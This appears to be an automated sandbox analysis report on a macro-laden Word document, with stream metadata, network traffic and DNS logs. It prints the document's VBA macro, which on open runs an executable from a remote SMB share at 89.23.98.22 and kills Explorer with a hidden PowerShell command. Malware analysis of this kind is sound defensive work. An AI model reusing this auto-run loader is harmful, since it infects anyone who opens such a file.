                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyRKybWKyz2dG/3WWGKbillfGgHV/ln:vdsCkWtSqA8Klp9l
                                                            MD5:3B714FD719897409D1B398BF5847D05B
                                                            SHA1:6866266D032B2AC31C26B78FF34AAA78B417B750
                                                            SHA-256:54DDB7333353A41706EF18A71962EB2C4DC6FCBFB8EEB4D9DC7EC94C15B7E49C
                                                            SHA-512:D0C3FD1795359BBA85FDD83CFB9D9859CD9E1B74BEB72EF1EDEE5E9A76931E1A3EFAE38807AEC6B4049532369B41F9A58FB0270AB07CE0B8DC55740E00607840
                                                            Malicious:false
                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:GLS_BINARY_LSB_FIRST
                                                            Category:dropped
                                                            Size (bytes):160
                                                            Entropy (8bit):4.666926004035285
                                                            Encrypted:false
                                                            SSDEEP:3:rmHfvtH//SWYhtC4d1ydYht1gUUGk+ltqqYhtq5kZty:rmHcaSgNGFlhYty
                                                            MD5:3317A43D2D73F6EDEC6009C461A003A8
                                                            SHA1:E45BBBE7C4303B6D0E566F93D1306E121C5D0AED
                                                            SHA-256:958864BEC871FCC14EB8B8245433C6D827311E86EC980566ECFD60EDCEBBAC18
                                                            SHA-512:09BBC8695DB0FCE4AB9FB993CB9FD33431C75839556CAD51B2B7348A4A13F88EAEC435CC48201252B848E2A0EBD5CE8028964692E4A2FF779482D523DDFE841A
                                                            Malicious:false
                                                            Preview:.................................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....3.qq..7I......6.........O2Kp....xZG.n.....,..l..@E............
                                                            Process:C:\Windows\System32\xcopy.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):176
                                                            Entropy (8bit):4.754419093809963
                                                            Encrypted:false
                                                            SSDEEP:3:xDwOXp4E2J5xAIoLLmfBqGCcFscAFiyoMXjRH3glVjFTJAJhYF6dOO0+fRAfQCvN:VwOP23f4aJqn0scxmTRHwlVXPUP0ZxvN
                                                            MD5:36AA0533485635C429BCAB4DF893B466
                                                            SHA1:ABFFE680F834AA7474DAC79DB081DA70D48ABBE6
                                                            SHA-256:303508A1C175F20386E768FE5A69FA7E3468B05DFB91709AFCE2E5D9C598A10E
                                                            SHA-512:58693AC8233B5BE7DD1DD7EBB1C76CC85B1F20E8064E43BCC53F662E922D6134E8D2FF895D9205E329BDE885AC3EB8EA394BBAA5213BE99596351D933725686C
                                                            Malicious:false
                                                            Preview:Does C:\Users\user\AppData\Local\Temp\persistent2\test2.exe specify a file name..or directory name on the target..(F = file, D = directory)? f..C:test2.exe..1 File(s) copied..
                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 21 04:52:00 2023, Last Saved Time/Date: Thu Dec 21 04:52:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                            Entropy (8bit):7.643339125203098
                                                            TrID:
                                                            • Microsoft Word document (32009/1) 54.23%
                                                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                            File name:42#U0430.doc
                                                            File size:688'128 bytes
                                                            MD5:de2e053acae98adbecc23ab3c0e9cf5d
                                                            SHA1:e404f9ff6a3d92fd7e153bb695be9c9eabc23d6c
                                                            SHA256:93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7
                                                            SHA512:179d113540c26fbc8f838e4c5e9b2778c151bb951d5d5f1be84930dd8f00c0be3f7268ecd957fe7a5a5ca4e312fe5e87e94f07eef5a9ca00590f1ead39b54b03
                                                            SSDEEP:12288:IBZRo5+bpfzUL6/1fnXh+vNYj1p0fQ20HG7mQ7S1RMZP:8YL6pXhMWiyGiQ7URM
                                                            TLSH:8EE402C0B2439B1AF5D1D6B21C87C390985ECF84F660CC5F749C76216F3BA5ABC5862A
                                                            File Content Preview:........................>.......................%...........(....................................... ...!..."...#...$..........................................................................................................................................
                                                            Icon Hash:2764a3aaaeb7bdbf
                                                            Document Type:OLE
                                                            Number of OLE Files:1
                                                            Has Summary Info:
                                                            Application Name:Microsoft Office Word
                                                            Encrypted Document:False
                                                            Contains Word Document Stream:True
                                                            Contains Workbook/Book Stream:False
                                                            Contains PowerPoint Document Stream:False
                                                            Contains Visio Document Stream:False
                                                            Contains ObjectPool Stream:False
                                                            Flash Objects Count:0
                                                            Contains VBA Macros:True
                                                            Code Page:1252
                                                            Title:
                                                            Subject:
                                                            Author:Admin
                                                            Keywords:
                                                            Comments:
                                                            Template:Normal.dotm
                                                            Last Saved By:Admin
                                                            Revision Number:3
                                                            Total Edit Time:0
                                                            Create Time:2023-12-21 04:52:00
                                                            Last Saved Time:2023-12-21 04:52:00
                                                            Number of Pages:1
                                                            Number of Words:0
                                                            Number of Characters:1
                                                            Creating Application:Microsoft Office Word
                                                            Security:0
                                                            Document Code Page:1252
                                                            Number of Lines:1
                                                            Number of Paragraphs:1
                                                            Thumbnail Scaling Desired:False
                                                            Company:
                                                            Contains Dirty Links:False
                                                            Shared Document:False
                                                            Changed Hyperlinks:False
                                                            Application Version:1048576
                                                            General
                                                            Stream Path:Macros/VBA/NewMacros
                                                            VBA File Name:NewMacros.bas
                                                            Stream Size:1102
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . 6 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . . . . . . @ . . . . .
                                                            Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 f8 03 00 00 00 00 00 00 01 00 00 00 ae fd 29 2e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Attribute VB_Name = "NewMacros"
                                                            Sub kjhkjhkd()
                                                            '
                                                            ' kjhkjhkd Macro
                                                            '
                                                            '
                                                            
                                                            End Sub
                                                            

                                                            General
                                                            Stream Path:Macros/VBA/ThisDocument
                                                            VBA File Name:ThisDocument.cls
                                                            Stream Size:2451
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i . s . D
                                                            Data Raw:01 16 03 00 01 f0 00 00 00 cc 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff d3 03 00 00 af 07 00 00 00 00 00 00 01 00 00 00 ae fd d9 b0 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Attribute VB_Name = "ThisDocument"
                                                            Attribute VB_Base = "1Normal.ThisDocument"
                                                            Attribute VB_GlobalNameSpace = False
                                                            Attribute VB_Creatable = False
                                                            Attribute VB_PredeclaredId = True
                                                            Attribute VB_Exposed = True
                                                            Attribute VB_TemplateDerived = True
                                                            Attribute VB_Customizable = True
                                                            Private Sub Document_Open()
                                                                Dim FASFASFHBNVNVB As String
                                                                Dim ireowrppqwcxva As String
                                                                
                                                                ' Remote share (UNC path) and the name of the executable expected on it (original comment lost to encoding)
                                                                FASFASFHBNVNVB = "\\89.23.98.22\LN\"
                                                                ireowrppqwcxva = "GB.exe"
                                                                
                                                                ' Open the UNC share in Explorer; the host initiates an outbound SMB connection to 89.23.98.22 (original comment lost to encoding)
                                                                Call Shell("explorer.exe """ & FASFASFHBNVNVB & """", vbNormalFocus)
                                                                
                                                                ' Hand off to RunExecutable to start the payload (original comment lost to encoding)
                                                                RunExecutable
                                                            End Sub
                                                            
                                                            Sub RunExecutable()
                                                                Dim FASFASFHBNVNVB As String
                                                                Dim ireowrppqwcxva As String
                                                                
                                                                ' Same remote share path and executable name as in Document_Open (original comment lost to encoding)
                                                                FASFASFHBNVNVB = "\\89.23.98.22\LN\"
                                                                ireowrppqwcxva = "GB.exe"
                                                                
                                                                ' Run the executable directly from the share, then terminate explorer.exe through a hidden PowerShell process (original comment lost to encoding)
                                                                Call Shell("""" & FASFASFHBNVNVB & ireowrppqwcxva & """", vbNormalFocus)
                                                                Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)
                                                            End Sub
                                                            
                                                            

                                                            General
                                                            Stream Path:\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.235956365095031
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            General
                                                            Stream Path:\x5DocumentSummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:4096
                                                            Entropy:0.2416851540298004
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                            General
                                                            Stream Path:\x5SummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:4096
                                                            Entropy:0.4449011682084879
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A d m i n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                                            General
                                                            Stream Path:1Table
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:7165
                                                            Entropy:5.853461283905875
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                            General
                                                            Stream Path:Data
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:649041
                                                            Entropy:7.785142599441219
                                                            Base64 Encoded:True
                                                            Data ASCII:Q . . D . d . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . C . . . . . . A . . . . . . . . . . . . . . . . . . . . 6 . _ . 1 . . . . . . . . . . . . . R . . . . . . # 2 . . d ~ . . . . . . . D . . . . . . . F . . . # 2 . . d ~ . n E x i f . . M M . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . j . ( . . . . . . . . . . . 1 . . . . . . . . . r . 2 . . . . .
                                                            Data Raw:51 e7 09 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e c6 41 01 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 44 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 20 00 00 00 04 41 01 00 00 00 05 c1 08 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 36 00 5f 00
                                                            General
                                                            Stream Path:Macros/PROJECT
                                                            CLSID:
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Stream Size:422
                                                            Entropy:5.379710895999521
                                                            Base64 Encoded:True
                                                            Data ASCII:I D = " { 5 D 6 A 1 2 2 E - 1 A 3 C - 4 8 7 3 - A 2 8 2 - D 7 C 7 F F C 3 A B 2 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 7 8 5 7 1 3 E F 3 C 6 3 C C A 3 C C A 3 C C A 3 C C A " . . D P B = " C C C E 3 A 8 1 3 A C 7 3 B C 7 3 B C 7 " . . G C = " 1 1 1 3 E 7 0 8 E 8 0 8 E 8 F 7 " . . . . [ H
                                                            Data Raw:49 44 3d 22 7b 35 44 36 41 31 32 32 45 2d 31 41 33 43 2d 34 38 37 33 2d 41 32 38 32 2d 44 37 43 37 46 46 43 33 41 42 32 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
                                                            General
                                                            Stream Path:Macros/PROJECTwm
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:71
                                                            Entropy:3.3485999524807437
                                                            Base64 Encoded:False
                                                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                                                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                                                            General
                                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:2622
                                                            Entropy:4.15417107322114
                                                            Base64 Encoded:False
                                                            Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                                                            Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_0
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:1452
                                                            Entropy:3.3996963922421832
                                                            Base64 Encoded:False
                                                            Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . J V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_1
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:122
                                                            Entropy:1.4349250578778767
                                                            Base64 Encoded:False
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_2
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:169
                                                            Entropy:1.5733294272801635
                                                            Base64 Encoded:False
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_3
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:156
                                                            Entropy:1.5811533511839717
                                                            Base64 Encoded:False
                                                            General
                                                            Stream Path:Macros/VBA/dir
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:569
                                                            Entropy:6.318529355416549
                                                            Base64 Encoded:True
                                                            General
                                                            Stream Path:WordDocument
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:4096
                                                            Entropy:1.0467291214812393
                                                            Base64 Encoded:False
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 21, 2023 09:50:31.017278910 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:31.017301083 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:31.017385960 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:31.023325920 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:31.023340940 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:31.490077972 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:31.490178108 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:31.506215096 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:31.506227016 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:31.506494999 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:31.514344931 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:31.560734034 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:32.471883059 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:32.471954107 CET | 443 | 49164 | 104.192.141.1 | 192.168.2.22
                                                            Dec 21, 2023 09:50:32.471987963 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:32.472142935 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Dec 21, 2023 09:50:32.477267981 CET | 49164 | 443 | 192.168.2.22 | 104.192.141.1
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 21, 2023 09:50:30.845541000 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                                                            Dec 21, 2023 09:50:31.006573915 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
                                                            Dec 21, 2023 09:50:32.481947899 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                                                            Dec 21, 2023 09:50:32.640578985 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                                                            Dec 21, 2023 09:50:32.641305923 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                                                            Dec 21, 2023 09:50:32.799340963 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                                                            Dec 21, 2023 09:50:32.799592972 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                                                            Dec 21, 2023 09:50:32.959451914 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                                                            Dec 21, 2023 09:50:32.959691048 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                                                            Dec 21, 2023 09:50:33.118021965 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                                                            Dec 21, 2023 09:50:33.118211985 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                                                            Dec 21, 2023 09:50:33.279392958 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Dec 21, 2023 09:50:30.845541000 CET | 192.168.2.22 | 8.8.8.8 | 0x4537 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.481947899 CET | 192.168.2.22 | 8.8.8.8 | 0xaaa4 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.641305923 CET | 192.168.2.22 | 8.8.8.8 | 0xaaa4 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799592972 CET | 192.168.2.22 | 8.8.8.8 | 0xaaa4 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.959691048 CET | 192.168.2.22 | 8.8.8.8 | 0xaaa4 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:33.118211985 CET | 192.168.2.22 | 8.8.8.8 | 0xaaa4 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Dec 21, 2023 09:50:31.006573915 CET | 8.8.8.8 | 192.168.2.22 | 0x4537 | No error (0) | bitbucket.org | | 104.192.141.1 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.199.241 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.27.139 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.40.49 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.106.73 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.234 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.139.153 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.27.104 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.640578985 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.34.177 | A (IP address) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 21, 2023 09:50:32.799340963 CET | 8.8.8.8 | 192.168.2.22 | 0xaaa4 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.199.241 | A (IP address) | IN (0x0001) | false
